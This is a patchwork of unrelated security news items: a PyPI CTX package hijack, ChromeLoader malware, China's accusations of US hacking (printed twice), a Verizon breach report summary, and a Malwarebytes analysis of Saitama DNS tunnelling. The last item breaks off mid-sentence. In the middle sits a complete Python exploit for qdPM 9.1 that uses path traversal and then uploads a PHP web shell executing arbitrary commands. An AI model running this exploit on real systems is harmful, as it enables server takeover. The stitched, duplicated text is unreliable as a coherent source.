They claim that all data received was deleted

They claim that all data received was deleted

A ‘security researcher’ accused of unethical activity through the alleged hijack of a popular open source project insists that their actions were not malicious.

Last week, as previously reported by _The Daily Swig_, social media users alerted the Python Package Index (PyPI) repository to a potentially malicious or hijacked package, CTX.

**BACKGROUND** Malicious Python library CTX removed from PyPI repo

On May 22, Reddit user SocketPuppets promoted the package online, claiming it had received an update after lying dormant for roughly eight years.

The CTX Python library was available on both GitHub and PyPI. However, it wasn’t long before participants on a Reddit thread highlighted that the GitHub package had not been updated at the same time as the PyPI repository.

To make matters worse, the individual responsible also allegedly compromised a different package, phpass.

Indian hacker Somdev Sangwan said: “Python’s CTX library and a fork of PHP’s phpass have been compromised.’

**Domain takeover**

With an estimated three million downloads combined, the Python packages had been tampered with to send environmental variables – such as AWS keys – to an external URL leading to a Heroku app.

Once alerted to the anomaly, PyPI removed the CTX package, explaining that the exfiltration method had been added after a perpetrator purchased a domain name for the expired email address used by the original developer, sent themselves a recovery password, and took over the account.

Read more of the latest hacking news from around the world

Users who installed the package between May 14 and May 22, 2022, may have had linked environmental variables and credentials compromised.

SocketPuppets (account since deleted) tried to defend their actions, claiming the unusual activity was due to a “new company account”.

The individual accused of the activity, then published a Medium blog post to share their “side of the story”.

“All this research DOES NOT contain any malicious activity,” Aydin said. “I want to show how this simple attack affects +10M users and companies. ALL THE DATA THAT I RECEIVED IS DELETED AND NOT USED.”

**‘Never responsibly disclosed’**

According to Aydin, a ‘scraper tool’ and a bot were used to take over the packages. It cost $5 to register the expired domain.

Aydin added that he sent a report to the bug bounty platform HackerOne on May 15 that was closed as a duplicate a day later.

Their HackerOne profile does not appear to show an associated bug report.

Speaking to _The Daily Swig_, Sangwan said that the vulnerability “was never responsibly disclosed”, and “this was an actual attack”.

Sangwan added: “After taking over the package, the attacker posted about it on Reddit… and when other users started getting suspicious and I discovered another package they had compromised. The attacker came out and claimed that he did it for ‘research’.

“Replacing a popular software with a backdoored version that steals password\[s\] of people is anything but research.”

**YOU MIGHT ALSO LIKE** Volatile market for stolen credit card data shaken up by sanctions against Russia

Security ‘researcher’ hits back against claims of malicious CTX file uploads

By Waqas
A new malvertising campaign has emerged in which ChromeLoader malware is being used to hijack browsers and steal…
This is a post from HackRead.com Read the original post: ChromeLoader Browser Malware Spreading Via Pirated Games and QR Codes

**A new malvertising campaign has emerged in which ChromeLoader malware is being used to hijack browsers and steal data.**

A sudden, unexpected spike in browser hijacking campaigns utilizing ChromeLoader malware has been detected lately, stated Aedan Russell from Red Canary. Russell noted that the attackers aim to hijack browsers through the “pervasive and persistent” ChromeLoader malware that can modify browser settings and redirect the victim to advertisement sites.

The malvertising campaign is financially motivated as the attackers are part of a wider network of marketing affiliates and redirect the user to advertising sites.

**What is ChromeLoader?**

For your information, ChromeLoader is a Chrome browser extension distributed as ISO files through pay-per-install websites and fraudulent social media posts usually offering QR codes, pirated movies, or cracked video games.

A screenshot of a Tweet shared by researchers shows a redacted scannable malicious QR code that leads to ChromeLoader’s download site

ChromeLoader changes web browser settings to display search results that lure users to download unwanted software, visit dating sites or adult games platforms, and participate in fake surveys. It stands apart among other browser hijackers for its incredible persistence, infection route, and volume involving abuse of PowerShell.

**Attack Scenario**

According to Red Canary’s blog post, the malware operators use a malicious ISO archive file to invade the system. This file is promoted as a cracked executable for commercial software or a video game so that the victims can download it from malicious sites or torrents. Malware operators also use Twitter posts to promote the malicious executable.

When the file is double-clicked by a user in Windows 10 or later systems, it is mounted as a virtual CD-ROM drive. Although it appears to be a keygen or game crack titled CS\_Installer.exe, the executable in this ISO file actually unleashes the malware.

ChromeLoader then executes/decodes a PowerShell command to fetch an archive from the remote resource and gets loaded on the system as a Chrome extension. Afterward, the PowerShell removes the scheduled task and infects Chrome with a discreetly injected extension to hijack and manipulate the browser results.

Red Canary researchers identified that ChromeLoader operators also target macOS systems to manipulate Safari web browser and Chrome. The infection chain is similar on macOS, but attackers use DMG (Apple Disk Image) file instead of ISO.

Furthermore, instead of the executable containing the installer, in macOS, an installer bash script is used to download and decompress the malware extension onto the private/var/tmp directory.

**More Chrome Browser and Malware News**

1.  New Jupyter backdoor malware steals Chrome, Firefox data
2.  New variant of MassLogger Trojan stealing Chrome, Outlook data
3.  Chrome extensions with 80 million+ users found engaging in ad fraud
4.  Malicious Chrome, Edge extensions manipulating Google search results
5.  Malware infected browser extensions stealing Chrome, and Edge user data

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

ChromeLoader Browser Malware Spreading Via Pirated Games and QR Codes

qdPM version 9.1 authenticated remote code execution exploit that leverages a path traversal.

    # Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net# Date: 2021-08-03# Original Exploit Author: Rishal Dwivedi (Loginsoft)# Original ExploitDB ID: 47954 (https://www.exploit-db.com/exploits/47954)# Exploit Author: Leon Trappett (thepcn3rd)# Vendor Homepage: http://qdpm.net/# Software Link: http://qdpm.net/download-qdpm-free-project-management# Version: <=1.9.1# Tested on: Ubuntu Server 20.04 (Python 3.9.2)# CVE : CVE-2020-7246# Exploit written in Python 3.9.2# Tested Environment - Ubuntu Server 20.04 LTS# Path Traversal + Remote Code Execution# Exploit modification: RedHatAugust#!/usr/bin/python3import sysimport requestsfrom lxml import htmlfrom argparse import ArgumentParsersession_requests = requests.session()def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar):    request_1 = {        'sf_method': (None, 'put'),        'users[id]': (None, userid[-1]),        'users[photo_preview]': (None, uservar),        'users[_csrf_token]': (None, csrftoken_[-1]),        'users[name]': (None, username[-1]),        'users[new_password]': (None, ''),        'users[email]': (None, EMAIL),        'extra_fields[9]': (None, ''),        'users[remove_photo]': (None, '1'),        }    return request_1def req(userid, username, csrftoken_, EMAIL, HOSTNAME):    request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '.htaccess')    new = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_1)    request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '../.htaccess')    new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_2)    request_3 = {        'sf_method': (None, 'put'),        'users[id]': (None, userid[-1]),        'users[photo_preview]': (None, ''),        'users[_csrf_token]': (None, csrftoken_[-1]),        'users[name]': (None, username[-1]),        'users[new_password]': (None, ''),        'users[email]': (None, EMAIL),        'extra_fields[9]': (None, ''),        'users[photo]': ('backdoor.php', '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>', 'application/octet-stream'),        }    upload_req = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_3)def main(HOSTNAME, EMAIL, PASSWORD):    url = HOSTNAME + '/index.php/login'    result = session_requests.get(url)    #print(result.text)    login_tree = html.fromstring(result.text)    authenticity_token = list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0]    payload = {'login[email]': EMAIL, 'login[password]': PASSWORD, 'login[_csrf_token]': authenticity_token}    result = session_requests.post(HOSTNAME + '/index.php/login', data=payload, headers=dict(referer=HOSTNAME + '/index.php/login'))    # The designated admin account does not have a myAccount page    account_page = session_requests.get(HOSTNAME + 'index.php/myAccount')    account_tree = html.fromstring(account_page.content)    userid = account_tree.xpath("//input[@name='users[id]']/@value")    username = account_tree.xpath("//input[@name='users[name]']/@value")    csrftoken_ = account_tree.xpath("//input[@name='users[_csrf_token]']/@value")    req(userid, username, csrftoken_, EMAIL, HOSTNAME)    get_file = session_requests.get(HOSTNAME + 'index.php/myAccount')    final_tree = html.fromstring(get_file.content)    backdoor = requests.get(HOSTNAME + "uploads/users/")    count = 0    dateStamp = "1970-01-01 00:00"    backdoorFile = ""    for line in backdoor.text.split("\n"):        count = count + 1        if "backdoor.php" in str(line):            try:                start = "\"right\""                end = " </td"                line = str(line)                dateStampNew = line[line.index(start)+8:line.index(end)]                if (dateStampNew > dateStamp):                    dateStamp = dateStampNew                    print("The DateStamp is " + dateStamp)                    backdoorFile = line[line.index("href")+6:line.index("php")+3]            except:                print("Exception occurred")                continue        #print(backdoor)    print('Backdoor uploaded at - > ' + HOSTNAME + 'uploads/users/' + backdoorFile + '?cmd=whoami')if __name__ == '__main__':    print("You are not able to use the designated admin account because they do not have a myAccount page.\n")    parser = ArgumentParser(description='qdmp - Path traversal + RCE Exploit')    parser.add_argument('-url', '--host', dest='hostname', help='Project URL')    parser.add_argument('-u', '--email', dest='email', help='User email (Any privilege account)')    parser.add_argument('-p', '--password', dest='password', help='User password')    args = parser.parse_args()    # Added detection if the arguments are passed and populated, if not display the arguments    if  (len(sys.argv) > 1 and isinstance(args.hostname, str) and isinstance(args.email, str) and isinstance(args.password, str)):            main(args.hostname, args.email, args.password)    else:        parser.print_help()

qdPM 9.1 Remote Code Execution

The Chinese government recently began saber-rattling about American cyberespionage. The catch? It’s all old news.

For the best part of a decade, US officials and cybersecurity companies have been naming and shaming hackers they believe work for the Chinese government. These hackers have stolen terabytes of data from pharmaceutical companies to video game firms, compromised servers, stripped security protections, and highjacked hacking tools, according to security experts. And as China’s alleged hacking has grown in aggression, individual Chinese hackers face indictments. However, things may be changing.

Since the start of 2022, there has been a marked uptick in China’s Foreign Ministry and the country’s cybersecurity firms calling out alleged US cyberespionage. Until now, these allegations have been a rarity. But the disclosures come with a catch: They appear to rely on years-old technical details, which are already publicly known and don’t contain fresh information. The move may be a strategic change for China as the nation tussles to cement its position as a tech superpower.

“These are useful materials for China’s tit-for-tat propaganda campaigns when they faced US accusation and indictment of China’s cyberespionage activities,” says Che Chang, a cyber threat analyst at Taiwan-based cybersecurity firm TeamT5.

China’s accusations, which were noted by security journalist Catalin Cimpanu, all follow a very similar pattern. On February 23, Chinese security company Pangu Lab published allegations that the US National Security Agency’s elite Equation Group hackers used a backdoor, dubbed Bvp47, to monitor 45 countries. The _Global Times_, a tabloid newspaper that’s part of China’s state-controlled media, ran an exclusive report on the research. Weeks later, on March 14, the newspaper had a second exclusive story about another NSA tool, NOPEN, based on details from China’s National Computer Virus Emergency Response Center. A week later, Chinese cybersecurity firm Qihoo 360 alleged that US hackers had been attacking Chinese companies and organizations. And on April 19, the Global Times reported on further National Computer Virus Emergency Response Center findings around HIVE, malware developed by the CIA.

The reports are accompanied with a flurry of statements—often in response to questions from the media—by China’s Foreign Ministry spokespeople. “China is gravely concerned over the irresponsible malicious cyber activities of the US government,” Foreign Ministry spokesperson Wang Wenbin said in April after one of the announcements. “We urge the US side to explain itself and immediately stop such malicious activities.” Over the first nine days of May, Foreign Ministry spokespeople commented on US cyber activities at least three times. “One cannot whitewash himself by smearing others,” Zhao Lijian said in one instance.

While cyber activity undertaken by state actors is often wrapped in highly classified files, many hacking tools developed by the US are no longer a secret. In 2017, WikiLeaks published 9,000 documents in the Vault7 leaks, which detailed many of the CIA’s tools. A year earlier, the mysterious Shadow Brokers hacking group stole data from one of the NSA’s elite hacking teams and slowly dripped the data to the world. The Shadow Brokers leaks included dozens of exploits and new zero-days—including the Eternal Blue hacking tool, which has since been used repeatedly in some of the largest cyberattacks. Many of the details in the Shadow Brokers leaks match up with details about NSA which were disclosed by Edward Snowden in 2013. (An NSA spokesperson said it has “no comment” for this story; the agency routinely does not comment on its activity.)

Ben Read, director of cyberespionage analysis at US cybersecurity firm Mandiant, says China’s state media push of alleged US hacking seems to be consistent, but it mostly contains older information. “Everything that I've seen they've written about, they tie back to the US through either the Snowden leaks or Shadow Brokers,” Read says.

Pangu Lab’s February report on Bvp47—the only publication on its website—says it initially discovered the details in 2013 but pieced them together after the Shadow Brokers leaks in 2017. “The report was based on a decade-old malware, and the decryption key is the same” as in WikiLeaks, Che says. The details of HIVE and NOPEN have also been available for years. Neither Pangu Labs or Qihoo 360, which has been on the US government sanctions list since 2020, responded to requests for comment on their research or methodology. Although a Pangu spokesperson previously said it recently published the old details, and it had taken a long time to analyze the data.

Megha Pardhi, a China researcher at Takshashila Institution, an Indian think tank, says the publications and follow-up comments from officials can serve multiple purposes. Internally, China can use it for propaganda and to send a message to the US that it has the capability to attribute cyber activity. But beyond this, there is a warning to other countries, Pardhi says. “The message is that even though you're allied with the United States, they're still gonna come after you.”

“We oppose and crack down in accordance with law all forms of cyberespionage and attacks,” Liu Pengyu, a spokesperson for the Chinese Embassy in the US, says in a statement. Liu did not respond directly to questions around the apparent uptick in finger-pointing at the US this year, the evidence that was being used to do so, or why this may be happening years after details originally emerged. China is widely considered to be one of the most sophisticated and active state cyber actors—involved in spying, hacking for espionage, and gathering data. Western officials consider the country to be the biggest cyber threat, ahead of Russia, Iran, and North Korea.

“Recently, there have been many reports of US carrying cyber theft and attacks on China and the whole world,” Liu says in a statement that reflects comments made by China’s Foreign Ministry spokespeople this year. “The US should reflect on itself and join others to jointly safeguard peace and security in cyberspace with a responsible attitude.”

Many of the disclosures in 2022—there are only a handful of previous Chinese accusations against the US—stem from private cybersecurity companies. This is similar to how Western cybersecurity companies report their findings; they are not always incorporated into government talking points, however, and state-backed media is all but nonexistent.

The potential shift in tactics could play into wider policies around technology use and development. In recent years, China’s policies have focused on positioning itself as a dominant force in technology standards in everything from 5G to quantum computers. A raft of new cybersecurity and privacy laws have detailed how companies should handle data and protect national information—including the potential for hoarding previously unknown vulnerabilities.

“One explanation is, possibly, that we are engaged in a kind of ideological—or if you want to put it more prosaically, a marketing—battle with China,” says Suzanne Spaulding, a senior adviser at the Center for Strategic and International Studies and previously a senior cybersecurity official in the Obama administration. The US-China relationship has been fraught in recent years, with tensions rising over national security issues including concerns of telecom giant Huawei. “China is offering, around the world, a competing model to Western-style democracy,” Spaulding says, noting that China may be responding to Western countries coming together on multiple issues since Russia invaded Ukraine.

In July 2021, China’s Ministry of Industry and Information Technology published plans to boost the private security industry by 2023. Companies based in China should spend more on their defenses against cyberattacks, the government department said at the time. It also said the whole cybersecurity industry within China should look to grow in size in the coming years, as well as bolster the development of network monitoring systems and threat detection techniques. “What we've started to see over the last couple of years, increasingly, is that companies in China are building their own capabilities,” says Adam Meyers, vice president of intelligence at US cybersecurity firm CrowdStrike. “There's been a few that have waded into the threat intelligence space.”

But publicizing details of the long-known incidents still raises plenty of questions. Mandiant’s Read says he wonders exactly how many cyberespionage cases Chinese companies and authorities are finding. The answer would provide significant clues about their true capabilities. Read says: “Is this 50 percent of what they're finding? Is this 1 percent of what they're finding? Is this 90 percent of what they're finding?”

The move appears to be strategic, says TeamT5’s Che. “Considering the close relationship between China's cybersecurity firms and the Chinese government, our team surmises that these reports could be a part of China’s strategic distraction when they are accused of massive surveillance systems and espionage operations.”

The Mystery of China’s Sudden Warnings About US Hackers

For the best part of a decade, US officials and cybersecurity companies have been naming and shaming hackers they believe work for the Chinese government. These hackers have stolen terabytes of data from companies like pharmaceutical and video game firms, compromised servers, stripped security protections, and highjacked hacking tools, according to security experts. And as China’s alleged hacking has grown more brazen, individual Chinese hackers face indictments. However, things may be changing.

Since the start of 2022, China’s Foreign Ministry and the country’s cybersecurity firms have increasingly been calling out alleged US cyberespionage. Until now, these allegations have been a rarity. But the disclosures come with a catch: They appear to rely on years-old technical details, which are already publicly known and don’t contain fresh information. The move may be a strategic change for China as the nation tussles to cement its position as a tech superpower.

“These are useful materials for China’s tit-for-tat propaganda campaigns when they faced US accusation and indictment of China’s cyberespionage activities,” says Che Chang, a cyber threat analyst at the Taiwan-based cybersecurity firm TeamT5.

China’s accusations, which were noted by security journalist Catalin Cimpanu, all follow a very similar pattern. On February 23, Chinese security company Pangu Lab published allegations that the US National Security Agency’s elite Equation Group hackers used a backdoor, dubbed Bvp47, to monitor 45 countries. The _Global Times_, a tabloid newspaper that’s part of China’s state-controlled media, ran an exclusive report on the research. Weeks later, on March 14, the newspaper had a second exclusive story about another NSA tool, NOPEN, based on details from China’s National Computer Virus Emergency Response Center. A week later, Chinese cybersecurity firm Qihoo 360 alleged that US hackers had been attacking Chinese companies and organizations. And on April 19, the _Global Times_ reported on further National Computer Virus Emergency Response Center findings about HIVE, malware developed by the CIA.

The reports are accompanied with a flurry of statements—often in response to questions from the media—by China’s Foreign Ministry spokespeople. “China is gravely concerned over the irresponsible malicious cyber activities of the US government,” Foreign Ministry spokesperson Wang Wenbin said in April after one of the announcements. “We urge the US side to explain itself and immediately stop such malicious activities.” Over the first nine days of May, Foreign Ministry spokespeople commented on US cyber activities at least three times. “One cannot whitewash himself by smearing others,” Zhao Lijian said in one instance.

While cyber activity undertaken by state actors is often wrapped in highly classified files, many hacking tools developed by the US are no longer secret. In 2017, WikiLeaks published 9,000 documents in the Vault7 leaks, which detailed many of the CIA’s tools. A year earlier, the mysterious Shadow Brokers hacking group stole data from one of the NSA’s elite hacking teams and slowly dripped the data to the world. The Shadow Brokers leaks included dozens of exploits and new zero-days—including the Eternal Blue hacking tool, which has since been used repeatedly in some of the largest cyberattacks. Many of the details in the Shadow Brokers leaks match up with details about NSA which were disclosed by Edward Snowden in 2013. (An NSA spokesperson said it has “no comment” for this story; the agency routinely does not comment on its activities.)

Ben Read, director of cyberespionage analysis at the US cybersecurity firm Mandiant, says China’s state media push of alleged US hacking seems to be consistent, but it mostly contains older information. “Everything that I've seen they've written about, they tie back to the US through either the Snowden leaks or Shadow Brokers,” Read says.

Pangu Lab’s February report on Bvp47—the only publication on its website—says it initially discovered the details in 2013 but pieced them together after the Shadow Brokers leaks in 2017. “The report was based on a decade-old malware, and the decryption key is the same” as in WikiLeaks, Che says. The details of HIVE and NOPEN have also been available for years. Neither Pangu Labs or Qihoo 360, which has been on the US government sanctions list since 2020, responded to requests for comment on their research or methodology. A Pangu spokesperson previously said it recently published the old details, and it had taken a long time to analyze the data.

Megha Pardhi, a China researcher at Takshashila Institution, an Indian think tank, says the publications and follow-up comments from officials can serve multiple purposes. Internally, China can use it for propaganda and to send a message to the US that it has the capability to attribute cyber activity. But beyond this, there is a warning to other countries, Pardhi says. “The message is that even though you're allied with the United States, they're still gonna come after you.”

“We oppose and crack down in accordance with law all forms of cyberespionage and attacks,” Liu Pengyu, a spokesperson for the Chinese Embassy in the US, says in a statement. Liu did not respond directly to questions around the apparent uptick in finger-pointing at the US this year, the evidence that was being used to do so, or why this may be happening years after details originally emerged. China is widely considered to be one of the most sophisticated and active state cyber actors—involved in spying, hacking for espionage, and gathering data. Western officials consider the country to be the biggest cyber threat, ahead of Russia, Iran, and North Korea.

“Recently, there have been many reports of US carrying cybertheft and attacks on China and the whole world,” Liu says in a statement that reflects comments made by China’s Foreign Ministry spokespeople this year. “The US should reflect on itself and join others to jointly safeguard peace and security in cyberspace with a responsible attitude.”

Many of the disclosures in 2022—there are only a handful of previous Chinese accusations against the US—stem from private cybersecurity companies. This is similar to how Western cybersecurity companies report their findings; they are not always incorporated into government talking points, however, and state-backed media is all but nonexistent.

The potential shift in tactics could play into wider policies around technology use and development. In recent years, China’s policies have focused on positioning itself as a dominant force in technology standards in everything from 5G to quantum computers. A raft of new cybersecurity and privacy laws have detailed how companies should handle data and protect national information—including the potential for hoarding previously unknown vulnerabilities.

“One explanation is, possibly, that we are engaged in a kind of ideological—or if you want to put it more prosaically, a marketing—battle with China,” says Suzanne Spaulding, a senior adviser at the Center for Strategic and International Studies and previously a senior cybersecurity official in the Obama administration. The US-China relationship has been fraught in recent years, with tensions rising over national security issues, including concerns about the telecom giant Huawei. “China is offering, around the world, a competing model to Western-style democracy,” Spaulding says, noting that China may be responding to Western countries coming together on multiple issues since Russia invaded Ukraine.

In July 2021, China’s Ministry of Industry and Information Technology published plans to boost the private security industry by 2023. Companies based in China should spend more on their defenses against cyberattacks, the government department said at the time. It also said the whole cybersecurity industry within China should look to grow in size in the coming years, as well as bolster the development of network monitoring systems and threat detection techniques. “What we've started to see over the last couple of years, increasingly, is that companies in China are building their own capabilities,” says Adam Meyers, head of intelligence at the US cybersecurity firm CrowdStrike. “There's been a few that have waded into the threat intelligence space.”

But publicizing details of the long-known incidents still raises plenty of questions. Mandiant’s Read says he wonders exactly how many cyberespionage cases Chinese companies and authorities are finding. The answer would provide significant clues about their true capabilities. Read says: “Is this 50 percent of what they're finding? Is this 1 percent of what they're finding? Is this 90 percent of what they're finding?”

The move appears to be strategic, says TeamT5’s Che. “Considering the close relationship between China's cybersecurity firms and the Chinese government, our team surmises that these reports could be a part of China’s strategic distraction when they are accused of massive surveillance systems and espionage operations.”

Supply chain and ransomware attacks increased dramatically in 2021, which explains why so many data breaches in Verizon's "2022 Data Breach Investigations Report" were grouped as system intrusion.

Breaches due to system intrusion have ratcheted up dramatically since 2019, according to Verizon’s "2022 Data Breach Investigations Report." While system intrusion, which includes hacking, malware, and ransomware, was the most common type of data breach in 2021, it didn’t even make the top three in 2019.

The researchers analyzed 23,896 security incidents, of which 5,212 were confirmed data breaches. Similar incidents are grouped together into “patterns.”

To clarify, DBIR looks at eight patterns:

*   **Basic Web application attacks:** Attacks against Web applications where the attacker is after the data.
*   **Denial-of-service attacks:** Network and application-layer attacks compromising the availability of networks and systems.
*   **Lost and stolen assets:** Assets that went missing, either maliciously or by mistake.
*   **Miscellaneous errors:** Unintentional actions compromised an asset’s security.
*   **Privilege misuse:** Involves unapproved or malicious use of legitimate privileges.
*   **Social engineering:** Tricking an individual into compromising the security of a device or data.
*   **System intrusion:** Attacks depending on malware (including ransomware) or hacking to compromise systems.
*   **“Everything else.”**

The second and third most common types of data breach in 2021 were basic Web application attacks and social engineering. In 2020, social engineering was the most common, followed by Web application attacks and then system intrusion. The top three in 2019 were Web application attacks, social engineering, and miscellaneous errors. System intrusions were the fourth most common pattern observed in Verizon’s dataset, the researchers said.

    

**Where the Threats Are**

System intrusions tend to be one of the more complex breaches because they consist of multiple different actions, such as social engineering, malware, and hacking. One reason for the spike for system intrusion may be the fact that supply chain and ransomware attacks increased dramatically this year, the researchers say. The most common actions -- how attackers are carrying out their activities -- for data breaches (grouped under system intrusions) included use of command-and-control servers to execute commands, stolen credentials, malware deploying backdoors, and ransomware. The five most common attack vectors were third-party software, software updates (SolarWinds, anyone?), desktop sharing software, email, and Web applications. 

In contrast, Web application attacks in Verizon's dataset consist of two groups of actions: ways to access the server and the payload itself. Ways to access the server include actions such as stealing credentials, exploiting vulnerabilities, and brute-forcing passwords. While the majority of the attacks focus on the Web application, breaches in this group, attackers also relied on backdoors, remote injection, and accessing desktop sharing software to compromise the server. 

The system intrusions in Verizon's dataset primarily targeted manufacturing (14.4%) and public-sector (13.9%) organizations. For Web applications, manufacturing remained the primary target, at 16.1%, and financial services was the second most popular target, at 15.8%. The list looks different for social engineering, where retail organizations (16.6%) were the most common target, followed by professional (13.8) organizations. 

While most breaches were the result of attacks by external adversaries, 14% of breaches were due to errors such as misconfigured cloud storage and exposed cloud servers. People are fallible – and it’s not just about configuration errors, as the report notes that 82% of breaches involved the human element. “Whether it is the use of stolen credentials, phishing, misuse, or simply an error, people continue to play a very large role in incidents and breaches alike,” researchers wrote.

Most Common Threats in DBIR

A walkthrough of one of the stealthy communication techniques employed in a recent attack using APT34's Saitama backdoor. 
The post How the Saitama backdoor uses DNS tunnelling appeared first on Malwarebytes Labs.

_Thanks to the Malwarebytes Threat Intelligence Team for the information they provided for this article._

Understandably, a lot of cybersecurity research and commentary focuses on the act of breaking into computers undetected. But threat actors are often just as concerned with the act of breaking _out_ of computers undetected too.

Malware with the intent of surveillance or espionage needs to operate undetected, but the chances are it also needs to exfiltrate data or exchange messages with its command and control infrastructure, both of which could reveal its presence to threat hunters.

One of the stealthy communication techniques employed by malware trying to avoid detection is DNS Tunnelling, which hides messages inside ordinary-looking DNS requests.

The Malwarebytes Threat Intelligence team recently published research about an attack on the Jordanian government by the Iranian Advanced Persistent Threat (APT) group APT34 that used its own innovative version of this method.

The payload in the attack was a backdoor called Saitama, a finite state machine that used DNS to communicate. Our original article provides an educational deep dive into the operation of Saitama and is well worth a read.

Here we will expand on the tricks that Saitama used to keep its DNS tunelling hidden.

**Saitama’s DNS tunnelling**

DNS is the Internet’s “address book” that allows computers to lookup human-readable domain names, like malwarebytes.com, and find their IP addresses, like 54.192.137.126.

DNS information isn’t held in a single database. Instead it’s distributed, and each domain has name servers that are responsible for answering questions about them. Threat actors can use DNS to communicate by having their malware make DNS lookups that are answered by name servers they control.

DNS is so important it’s almost never blocked by corporate firewalls, and the enormous volume of DNS traffic on corporate networks provides plenty of cover for malicious communication.

Saitama’s messages are shaped by two important concerns: DNS traffic is still largely unencrypted, so messages have to be obscured so their purpose isn’t obvious; and DNS records are often cached heavily, so identical messages have to look different to reach the APT-controlled name servers.

**Saitama’s messages**

In the attack on the Jordanian foreign ministry, Saitama’s domain lookups used the following syntax:

domain = **message**, **counter** '.' **root domain**

The root domain is always one of uber-asia.com, asiaworldremit.com or joexpediagroup.com, which are used interchangeably.

The sub-domain portion of each lookup consists of a message followed by a counter. The counter is used to encode the message, and is sent to the command and control (C2) server with each lookup so the C2 can decode the message.

Four types of message can be sent:

**1\. Make contact**

The first time it is executed, Saitama starts its counter by choosing a random number between 0 and 46655. In this example our randomly-generated counter is 7805.

The DNS lookup derived from that counter is:

**nbn4vxanrj.joexpediagroup.com**

The counter itself is encoded using a hard-coded base36 alphabet that is shared by the name server. In base36 each digit is represented by one of the 36 characters 0-9 and A-Z. In the standard base36, alphabet 7805 is written 60t (6 x 1296 + 0 x 36 + 30 x 1). However, in Saitama’s custom alphabet 7805 is **nrj**.

The counter is also used to generate a custom alphabet that will be used to encode the message using a simple substitution. The first message sent home is the command 0, base36-encoded to a, which tells the server it has a new victim, prepended to the string haruto, making aharuto.

A simple substitution using the alphabet generated by the counter yields the message **nbn4vxa**.

**a** b c d e f g **h** i j k l m n **o** p q **r** s **t u** v w x y z 0 1 2 3 4 5 6 7 8 9
↓             ↓             ↓     ↓   ↓ ↓             
**n** j 1 6 9 k p **b** h d 0 7 y i **a** 2 g **4** u **x** **v** 3 e s w f 5 8 r o c q t l z m

The C2 name server decodes the counter using the shared, hard-coded alphabet, and then uses the counter to derive the alphabet used to encode aharuto.

It responds to the contact request with an IP address that contains an ID for Saitama to use in future communications. The first three octets can be anything, and Saitama ignores them. The final octet contains the ID. In our example we will use the ID 203:

75.99.87.**203**

**2\. Ask for a command**

Now that it has an ID from the C2 server, Saitama increments its counter to 7806 and signals its readiness to receive a command as follows: The counter is used to generate a new custom alaphabet, which encodes the ID, 203, as **ao**. The counter itself is encoded using the malware’s hard-coded base36 alphabet, to **nrc**, and one of Saitama’s three root domains is chosen at random, resulting in:

**aonrc.uber-asia.com**

The C2 server responds to the request with the size of the payload Saitama should expect. Saitama will use this to determine how many requests it will need to make to retrieve the full payload.

The first octet of the IP address the C2 responds with is any number between 129 and 255, while the second, third and fourth octets signify the first, second, and third bytes of the size of the payload. In this case the payload will be four bytes.

129.**0**.**0**.**4**

**3\. Get a command**

Now that it knows the size of the payload it will receive, Saitama makes one or more RECEIVE requests to the server to get its instructions. It increments its counter by one each time, starting at 7807. Multiple requests may be necessary in this step because some command names require more than the four bytes of information an IP address can carry. In this case it has been told to retrieve four bytes of information so it will only need to make one request.

The message from Saitama consists of three parts: The digit 2, indicating the RECEIVE command; the ID 203; and an offset indicating which part of the payload is required. These are individually base36-encoded and concatenated together. The resulting string is encoded using a custom base36 alphabet derived from the counter 7807, giving us the message **k7myyy**.

The counter is encoded using the hard-coded alphabet to **nr6**, and one of Saitama’s three root domains is chosen at random, giving us:

**k7myyynr6.asiaworldremit.com**

The C2 indicates which function it wants to run using two-digit integers. It can ask Saitama to run any of five different functions:

C2

Saitama

43

Static

70

Cmd

71

CompressedCmd

95

File

96

CompressedFile

Saitama functions

In this case the C2 wants to run the command ver using Saitama’s Cmd function. (In the previous request the C2 indicated that it would be sending Saitama a four byte payload: One byte for 70, and three bytes for ver.)

In its response, the C2 uses the first octet of the IP address to indicate the function it wants to run, 70, and then the remaining three octets to spell out the command name ver using the ASCII codepoints for the lowercase characters “v”, “e”, and “r”:

**70**.**118**.**101**.**114**

**4\. Run the command**

Saitama runs the command it has been given and sends the resulting output to the C2 server in one or more DNS requests. The counter is incremented by one each time, starting at 7808 in our example. Multiple requests may be necessary in this step because some command names require more than the four bytes an IP address can carry.

**p6yqqqqp0b67gcj5c2r3gn3l9epztnrb.asiaworldremit.com**

The counter is encoded using the hard-coded alphabet to **nrb**, and one of Saitama’s three root domains is chosen at random.

In this case the message consists of five parts: The digit 2, indicating the RECEIVE command; the ID 203; and an offset indicating which part of the response is being sent; the size of the buffer; and a twelve-byte chunk of the output. These are individually base36-encoded and concatenated together. The resulting string is encoded using a custom base36 alphabet derived from the counter 7808, giving us the message **p6yqqqqp0b67gcj5c2r3gn3l9epzt**.

**Detection**

Malwarebytes customers are protected from this attack via our Anti-Exploit layer. To learn more about the recent attack involving Saitama, read APT34 targets Jordan Government using new Saitama backdoor.

**IOCs******Maldoc****

Confirmation Receive Document.xls  
26884f872f4fae13da21fa2a24c24e963ee1eb66da47e270246d6d9dc7204c2b

**Saitama backdoor**

update.exe  
e0872958b8d3824089e5e1cfab03d9d98d22b9bcb294463818d721380075a52d

**C2s**

uber-asia.com  
asiaworldremit.com  
joexpediagroup.com

How the Saitama backdoor uses DNS tunnelling

An unknown advanced persistent threat (APT) group has been linked to a series of spear-phishing attacks targeting Russian government entities since the onset of the Russo-Ukrainian war in late February 2022.
"The campaigns [...] are designed to implant a Remote Access Trojan (RAT) that can be used to surveil the computers it infects, and run commands on them remotely," Malwarebytes said in a

An unknown advanced persistent threat (APT) group has been linked to a series of spear-phishing attacks targeting Russian government entities since the onset of the Russo-Ukrainian war in late February 2022.

